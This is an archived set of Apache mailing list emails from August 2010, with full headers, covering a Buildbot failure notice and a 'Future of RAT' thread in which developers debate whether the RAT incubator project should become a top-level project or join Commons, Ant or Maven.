[161.129.204.104]) by aegis.apache.org (Postfix) with SMTP id 593A6C004B for <[email protected]>; Tue, 10 Aug 2010 10:56:21 +0000 (UTC) MIME-Version: 1.0 Content-Type: text/plain Date: Tue, 10 Aug 2010 10:56:21 +0000 Subject: buildbot failure in ASF Buildbot on rat_trunk From: [email protected] To: [email protected] Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org The Buildbot has detected a new failure of rat_trunk on ASF Buildbot. Full details are available at: http://ci.apache.org/builders/rat_trunk/builds/43 Buildbot URL: http://ci.apache.org/ Buildslave for this Build: isis_ubuntu Build Reason: forced: by IRC user <gmcdonald> on channel #asftest: testing Build Source Stamp: HEAD Blamelist: BUILD FAILED: failed compile sincerely, -The Buildbot From [email protected] Tue Aug 10 11:12:31 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30440 invoked from network); 10 Aug 2010 11:12:30 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 11:12:30 -0000 Received: (qmail 54139 invoked by uid 500); 10 Aug 2010 11:12:30 -0000 Delivered-To: [email protected] Received: (qmail 54095 invoked by uid 500); 10 Aug 2010 11:12:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54086 invoked by uid 99); 10 Aug 2010 11:12:28 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 11:12:28 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO relay2.mail.ox.ac.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 11:12:19 +0000 Received: from smtp2.mail.ox.ac.uk ([161.129.204.104]) by relay2.mail.ox.ac.uk with esmtp (Exim 4.71) (envelope-from <[email protected]>) id 1OimkQ-0001Rs-96 for [email protected]; Tue, 10 Aug 2010 12:11:58 +0100 Received: from oucs-sander2.oucs.ox.ac.uk ([161.129.204.104]) by smtp2.mail.ox.ac.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1OimkQ-0003io-8P for [email protected]; Tue, 10 Aug 2010 12:11:58 +0100 Message-ID: <[email protected]> Date: Tue, 10 Aug 2010 12:11:45 +0100 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20100711 Thunderbird/3.0.6 MIME-Version: 1.0 To: [email protected] Subject: Re: Future of RAT References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Oxford-Username: oucs0040 X-Virus-Checked: Checked by ClamAV on apache.org On 10/08/2010 11:40, Jochen Wiedmann wrote: > The question is: What's the target? This came up in a board meeting a while back. The suggestion was infra@ > But Commons would be an excellent choice It's not really a commons type of project in my view. Commons is about java components, RAT is a build/QA tool. I'd suggest ANT if it wouldn't upset Maven (and vice-versa) Ross From [email protected] Tue Aug 10 11:13:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30615 invoked from network); 10 Aug 2010 11:13:16 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 11:13:16 -0000 Received: (qmail 54440 invoked by uid 500); 10 Aug 2010 11:13:16 -0000 Delivered-To: [email protected] Received: (qmail 54397 invoked by uid 500); 10 Aug 2010 11:13:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54389 invoked by uid 99); 10 Aug 2010 11:13:14 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 11:13:14 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO relay2.mail.ox.ac.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 11:13:06 +0000 Received: from smtp2.mail.ox.ac.uk ([161.129.204.104]) by relay2.mail.ox.ac.uk with esmtp (Exim 4.71) (envelope-from <[email protected]>) id 1OimlA-0001Yo-97 for [email protected]; Tue, 10 Aug 2010 12:12:44 +0100 Received: from oucs-sander2.oucs.ox.ac.uk ([161.129.204.104]) by smtp2.mail.ox.ac.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1OimlA-0003kS-8J for [email protected]; Tue, 10 Aug 2010 12:12:44 +0100 Message-ID: <[email protected]> Date: Tue, 10 Aug 2010 12:12:31 +0100 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20100711 Thunderbird/3.0.6 MIME-Version: 1.0 To: [email protected] Subject: Re: Future of RAT References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Oxford-Username: oucs0040 On 10/08/2010 11:40, Jochen Wiedmann wrote: > The question is: What's the target? This came up in a board meeting a while back. The suggestion was infra@ > But Commons would be an excellent choice It's not really a commons type of project in my view. Commons is about java components, RAT is a build/QA tool. I'd suggest ANT if it wouldn't upset Maven (and vice-versa) Ross From [email protected] Tue Aug 10 13:05:21 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80572 invoked from network); 10 Aug 2010 13:05:21 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 13:05:21 -0000 Received: (qmail 7729 invoked by uid 500); 10 Aug 2010 13:05:21 -0000 Delivered-To: [email protected] Received: (qmail 7679 invoked by uid 500); 10 Aug 2010 13:05:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7671 invoked by uid 99); 10 Aug 2010 13:05:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 13:05:19 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 13:05:12 +0000 Received: by qyk11 with SMTP id 11so3258181qyk.6 for <[email protected]>; Tue, 10 Aug 2010 06:04:50 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a1mr9577570qab.324.1281445490626; Tue, 10 Aug 2010 06:04:50 -0700 (PDT) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Tue, 10 Aug 2010 06:04:50 -0700 (PDT) X-Originating-IP: [161.129.204.104] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Tue, 10 Aug 2010 08:04:50 -0500 X-Google-Sender-Auth: 9v8fIrs2KI_G-OaAktXuVyEQKQA Message-ID: <[email protected]> Subject: Re: Future of RAT From: "Hyrum K. Wright" <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 On Tue, Aug 10, 2010 at 6:11 AM, Ross Gardler <[email protected]> wrote: > On 10/08/2010 11:40, Jochen Wiedmann wrote: > >> The question is: What's the target? > > This came up in a board meeting a while back. The suggestion was infra@ > >> But Commons would be an excellent choice > > It's not really a commons type of project in my view. Commons is about java > components, RAT is a build/QA tool. > > I'd suggest ANT if it wouldn't upset Maven (and vice-versa) At the last retreat, somebody suggested creating an Util TLP with the goal of including all these types of projects: not strictly infra, not really meant for external consumption, either. RAT could be used to seed that project, and it would then be joined by other such utilities. I'm not against Commons (or Maven, or Ant), but if we go to one of those locations, it means we're answering this question again the next time this situation comes up. -Hyrum From [email protected] Tue Aug 10 13:59:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3389 invoked from network); 10 Aug 2010 13:59:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 13:59:15 -0000 Received: (qmail 28073 invoked by uid 500); 10 Aug 2010 13:59:15 -0000 Delivered-To: [email protected] Received: (qmail 27998 invoked by uid 500); 10 Aug 2010 13:59:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27973 invoked by uid 99); 10 Aug 2010 13:59:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 13:59:12 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 13:59:07 +0000 Received: by qyk11 with SMTP id 11so3317322qyk.6 for <multiple recipients>; Tue, 10 Aug 2010 06:58:46 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:reply-to :in-reply-to:references:date:message-id:subject:from:to:cc :content-type:content-transfer-encoding; bh=wU9/Mw72O7EbjD9ZeXNbA7gVKOfohQWaL5d1IZimsVk=; b=PBVjhHDSymeH2e6xCasLc//ucg80LzKQ6zJiIvCz3pRWxwS9CLUYOSy8VPXu41ct8y ZMlv9N6k7XBsJ9fN923tAhsWVgzlEv+YJKSpXfbI4tdF9jNtSUOuQopvOtWEs90IvQoT hAUS2NN8RtNQLDQHbfDkcPO7pz9oTTciHpSlk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:reply-to:in-reply-to:references:date:message-id :subject:from:to:cc:content-type:content-transfer-encoding; b=bu580Tfrfd7FRlXHba7s8CQmT9r3VjPunIxunGatJg7gESETn3XnHCXCHtRneeJP+r EKR0cX6uDZcOMyp0zBwCEYK+QGhwsVMHYyf5R20r5fwy7wcIZSsyMEwrnTIinnXIBt8H lcGUjkXeb85oJKw+KKTFvLu12XedRT7AAm034= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id p5mr9642280qah.331.1281448726190; Tue, 10 Aug 2010 06:58:46 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 10 Aug 2010 06:58:46 -0700 (PDT) Reply-To: [email protected] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Tue, 10 Aug 2010 14:58:46 +0100 Message-ID: <[email protected]> Subject: Re: Future of RAT From: ant elder <[email protected]> To: [email protected] Cc: "[email protected]" <[email protected]>, Apache Commons Developers List <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable On Tue, Aug 10, 2010 at 2:45 PM, Mattmann, Chris A (388J) <[email protected]> wrote: > However, I'm not sure I get the whole reasoning below RE: TLP? Why not ha= ve a RAT TLP? The overhead of filing board reports and not knowing anyone o= n the team that would be able to? Hen files them all the time (well he used= to as Attic VP). And the other names I see on that list [1] below are all = people I widely respect at the ASF and folks who pop up on board@, members@= and other foundation-wide lists from time to time. I don't want to speak f= or anybody, but what would be the issue with any of them filing board repor= ts? Or, yourself for that matter? :) You see to get this whole release proc= ess thing - how is the board report sent monthly for the first few months, = then quarterly after such a big deal? So, what's the problem with being a T= LP? Yep i agree, there are already other small TLPs so it doesn't need to be an issue, so going TLP does sound ideal. ...ant From [email protected] Tue Aug 10 14:00:07 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4169 invoked from network); 10 Aug 2010 14:00:07 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 14:00:07 -0000 Received: (qmail 29261 invoked by uid 500); 10 Aug 2010 14:00:07 -0000 Delivered-To: [email protected] Received: (qmail 29217 invoked by uid 500); 10 Aug 2010 14:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29200 invoked by uid 99); 10 Aug 2010 14:00:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 14:00:05 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 13:59:58 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id 8EACA40E000A; Tue, 10 Aug 2010 15:59:37 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id U4aAamEDwppH; Tue, 10 Aug 2010 15:59:37 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 00CBB40E0009; Tue, 10 Aug 2010 15:59:36 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected], [email protected], [email protected] Subject: Re: Future of RAT References: <[email protected]> X-Draft-From: ("nnfolder:mail.apache-incubator" 17915) Date: Tue, 10 Aug 2010 15:59:36 +0200 In-Reply-To: <[email protected]> (Chris A. Mattmann's message of "Tue, 10 Aug 2010 06:45:36 -0700") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org On 2010-08-10, Mattmann, Chris A (388J) wrote: > However, I'm not sure I get the whole reasoning below RE: TLP? Why not > have a RAT TLP? The overhead of filing board reports and not knowing > anyone on the team that would be able to? Jochen has sure be joking here. The team list he pointed at contains at least two current PMC chairs (haven't checked too closely) as well as a bunch of former PMC chairs. To me RAT's scope feels too small for a TLP. Stefan From [email protected] Tue Aug 10 14:06:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10548 invoked from network); 10 Aug 2010 14:06:45 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 14:06:45 -0000 Received: (qmail 40935 invoked by uid 500); 10 Aug 2010 14:06:45 -0000 Delivered-To: [email protected] Received: (qmail 40879 invoked by uid 500); 10 Aug 2010 14:06:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 36397 invoked by uid 99); 10 Aug 2010 14:04:17 -0000 X-ASF-Spam-Status: No, hits=-2.3 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) From: "Mattmann, Chris A (388J)" <[email protected]> To: "[email protected]" <[email protected]>, "[email protected]" <[email protected]>, "[email protected]" <[email protected]> Date: Tue, 10 Aug 2010 07:03:43 -0700 Subject: Re: Future of RAT Thread-Topic: Future of RAT Thread-Index: Acs4lFpzqfvBEnItQsu/mnyJNz2LZAAAHzvz Message-ID: <[email protected]> In-Reply-To: <[email protected]> Accept-Language: en-US Content-Language: en X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: en-US Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 X-Source-IP: altvirehtstap02.jpl.nasa.gov [161.129.204.104] X-Source-Sender: [email protected] X-AUTH: Authorized X-Virus-Checked: Checked by ClamAV on apache.org Hi Stefan, >> However, I'm not sure I get the whole reasoning below RE: TLP? Why not >> have a RAT TLP? The overhead of filing board reports and not knowing >> anyone on the team that would be able to? >=20 > Jochen has sure be joking here. The team list he pointed at contains at > least two current PMC chairs (haven't checked too closely) as well as a > bunch of former PMC chairs. Heh, that's what I was thinking. >=20 > To me RAT's scope feels too small for a TLP. I feel kind of the opposite -- RAT is an important tool that's required of all the Incubator projects, but pretty widely integrated (at least in Java land) outside of the Incubator as a tool to help check ASF policies. To me, that's a big scope and an important community, and just based on the telltale signs it seems like a TLP to me. Cheers, Chris ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Chris Mattmann, Ph.D. Senior Computer Scientist NASA Jet Propulsion Laboratory Pasadena, CA 91109 USA Office: 171-266B, Mailstop: 171-246 Email: [email protected] WWW: http://sunset.usc.edu/~mattmann/ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Adjunct Assistant Professor, Computer Science Department University of Southern California, Los Angeles, CA 90089 USA ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ From [email protected] Tue Aug 10 16:20:11 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60922 invoked from network); 10 Aug 2010 16:20:11 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 16:20:11 -0000 Received: (qmail 20087 invoked by uid 500); 10 Aug 2010 16:20:11 -0000 Delivered-To: [email protected] Received: (qmail 20032 invoked by uid 500); 10 Aug 2010 16:20:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20009 invoked by uid 99); 10 Aug 2010 16:20:10 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 16:20:10 +0000 X-ASF-Spam-Status: No, hits=-2.3 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO rcsinet10.oracle.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 16:20:02 +0000 Received: from rcsinet13.oracle.com (rcsinet13.oracle.com [161.129.204.104]) by rcsinet10.oracle.com (Switch-3.4.2/Switch-3.4.2) with ESMTP id o7AGJeAf007300 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK); Tue, 10 Aug 2010 16:19:41 GMT Received: from acsmt353.oracle.com (acsmt353.oracle.com [161.129.204.104]) by rcsinet13.oracle.com (Switch-3.4.2/Switch-3.4.1) with ESMTP id o7A9JERF016688; Tue, 10 Aug 2010 16:19:39 GMT Received: from abhmt017.oracle.com by acsmt353.oracle.com with ESMTP id 483372531281457127; Tue, 10 Aug 2010 09:18:47 -0700 Received: from [161.129.204.104] (/161.129.204.104) by default (Oracle Beehive Gateway v4.0) with ESMTP ; Tue, 10 Aug 2010 09:18:46 -0700 From: Craig L Russell <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Subject: Re: Future of RAT References: <[email protected]> Message-Id: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v936) Date: Tue, 10 Aug 2010 09:18:43 -0700 Cc: "[email protected]" <[email protected]>, "[email protected]" <[email protected]> X-Mailer: Apple Mail (2.936) X-Virus-Checked: Checked by ClamAV on apache.org On Aug 10, 2010, at 7:03 AM, Mattmann, Chris A (388J) wrote: > Hi Stefan, > >>> However, I'm not sure I get the whole reasoning below RE: TLP? Why >>> not >>> have a RAT TLP? The overhead of filing board reports and not knowing >>> anyone on the team that would be able to? >> >> Jochen has sure be joking here. The team list he pointed at >> contains at >> least two current PMC chairs (haven't checked too closely) as well >> as a >> bunch of former PMC chairs. > > Heh, that's what I was thinking. > >> >> To me RAT's scope feels too small for a TLP. > > I feel kind of the opposite -- RAT is an important tool that's > required of > all the Incubator projects, but pretty widely integrated (at least > in Java > land) outside of the Incubator as a tool to help check ASF policies. > To me, > that's a big scope and an important community, and just based on the > telltale signs it seems like a TLP to me. First, congratulations to everyone who contributed to RAT during incubation, and especially to those who prepared a release in the incubator. That's a big deal. As to becoming TLP, I agree. As long as the folks who contribute to RAT continue to take feedback and make releases I see no reason to deny them the opportunity to have a RAT TLP. There's nothing that I can think of that says a small scope project cannot be a successful TLP. In fact, the small scope helps in one regard: there's not much work involved in making board reports. Craig > > Cheers, > Chris > > ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > Chris Mattmann, Ph.D. > Senior Computer Scientist > NASA Jet Propulsion Laboratory Pasadena, CA 91109 USA > Office: 171-266B, Mailstop: 171-246 > Email: [email protected] > WWW: http://sunset.usc.edu/~mattmann/ > ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > Adjunct Assistant Professor, Computer Science Department > University of Southern California, Los Angeles, CA 90089 USA > ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > Craig L Russell Architect, Oracle http://db.apache.org/jdo 5047774238 mailto:[email protected] P.S. A good JDO? O, Gasp! From [email protected] Tue Aug 10 17:22:48 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87524 invoked from network); 10 Aug 2010 17:22:48 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 17:22:48 -0000 Received: (qmail 31036 invoked by uid 500); 10 Aug 2010 17:22:48 -0000 Delivered-To: [email protected] Received: (qmail 31003 invoked by uid 500); 10 Aug 2010 17:22:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30989 invoked by uid 99); 10 Aug 2010 17:22:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 17:22:48 +0000 X-ASF-Spam-Status: No, hits=-2.3 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.jpl.nasa.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 17:22:42 +0000 Received: from mail.jpl.nasa.gov (altvirehtstap02.jpl.nasa.gov [161.129.204.104]) by smtp.jpl.nasa.gov (Switch-3.4.3/Switch-3.4.3) with ESMTP id o7AHMAB8006205 (using TLSv1/SSLv3 with cipher RC4-MD5 (128 bits) verified FAIL); Tue, 10 Aug 2010 10:22:20 -0700 Received: from ALTPHYEMBEVSP20.RES.AD.JPL ([161.129.204.104]) by ALTVIREHTSTAP02.RES.AD.JPL ([161.129.204.104]) with mapi; Tue, 10 Aug 2010 10:22:15 -0700 From: "Mattmann, Chris A (388J)" <[email protected]> To: "[email protected]" <[email protected]>, "[email protected]" <[email protected]> Date: Tue, 10 Aug 2010 10:22:13 -0700 Subject: Re: Future of RAT Thread-Topic: Future of RAT Thread-Index: Acs4sGlgXthTDtKnS369YsHV3JVdGQAACjog Message-ID: <[email protected]> In-Reply-To: <[email protected]> Accept-Language: en-US Content-Language: en X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: en-US Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 X-Source-IP: altvirehtstap02.jpl.nasa.gov [161.129.204.104] X-Source-Sender: [email protected] X-AUTH: Authorized Hi All, >=20 > TLPs are not "expensive", so they don't have to have a "minimum size" > to justify their existence. +1. Cheers, Chris ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Chris Mattmann, Ph.D. Senior Computer Scientist NASA Jet Propulsion Laboratory Pasadena, CA 91109 USA Office: 171-266B, Mailstop: 171-246 Email: [email protected] WWW: http://sunset.usc.edu/~mattmann/ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Adjunct Assistant Professor, Computer Science Department University of Southern California, Los Angeles, CA 90089 USA ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ From [email protected] Tue Aug 10 17:59:42 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97659 invoked from network); 10 Aug 2010 17:59:41 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 17:59:41 -0000 Received: (qmail 98049 invoked by uid 500); 10 Aug 2010 17:59:41 -0000 Delivered-To: [email protected] Received: (qmail 97990 invoked by uid 500); 10 Aug 2010 17:59:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97975 invoked by uid 99); 10 Aug 2010 17:59:41 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 17:59:41 +0000 X-ASF-Spam-Status: No, hits=-2.3 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.jpl.nasa.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 17:59:36 +0000 Received: from mail.jpl.nasa.gov (altvirehtstap01.jpl.nasa.gov [161.129.204.104]) by smtp.jpl.nasa.gov (Switch-3.4.3/Switch-3.4.3) with ESMTP id o7AHxE2I030124 (using TLSv1/SSLv3 with cipher RC4-MD5 (128 bits) verified FAIL); Tue, 10 Aug 2010 10:59:15 -0700 Received: from ALTPHYEMBEVSP20.RES.AD.JPL ([161.129.204.104]) by ALTVIREHTSTAP01.RES.AD.JPL ([161.129.204.104]) with mapi; Tue, 10 Aug 2010 10:59:14 -0700 From: "Mattmann, Chris A (388J)" <[email protected]> To: "[email protected]" <[email protected]> CC: "[email protected]" <[email protected]> Date: Tue, 10 Aug 2010 10:59:12 -0700 Subject: Re: Future of RAT Thread-Topic: Future of RAT Thread-Index: Acs4tRvanV5spj+sTICC2L37QKahhAAAKEQa Message-ID: <[email protected]> In-Reply-To: <[email protected]> Accept-Language: en-US Content-Language: en X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: en-US Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 X-Source-IP: altvirehtstap01.jpl.nasa.gov [161.129.204.104] X-Source-Sender: [email protected] X-AUTH: Authorized Hi Dan, > Perhaps this just needs generalizing a smidge. >=20 > Who are the users of/community for RAT? If that can be determined then t= he > TLP should be named after this community, rather than after RAT itself. >=20 > eg, if RAT is deemed to be for "internal" apache use, then call the TLP > internal.apache.org. RAT then just happens to be the first such "interna= l" > tool. If other tools for the same community are written, then they woul= d > also go into this TLP. While I'm not against what you propose at all, I don't think it makes sense to use the graduation of RAT in isolation as a vehicle for your proposal above. If such a proposal makes sense (after time of seeing more and more "internal" Apache tools), then it would make sense to put it forward at tha= t time. In the meanwhile, there is an actionable, concrete proposal here I believe for a RAT TLP. +1 to Greg's comments: every TLP doesn't have to be a behemoth pseudo-Incubator like many of our other TLPs. Some of them work just fine as smaller, driven projects with communities of all sizes. Cheers, Chris >=20 >=20 >=20 > On 10 August 2010 18:20, Greg Stein <[email protected]> wrote: >=20 >> Let me repeat: where does it say a TLP must be "at least THIS size" ? >>=20 >> Answer: nowhere. >>=20 >> Small projects are just fine. We're looking at the overall community >> and the people to shepherd that community. Those are the RAT >> developers and users. Not the Apache Commons or Apache Maven people. >> They have other concerns and focus points. >>=20 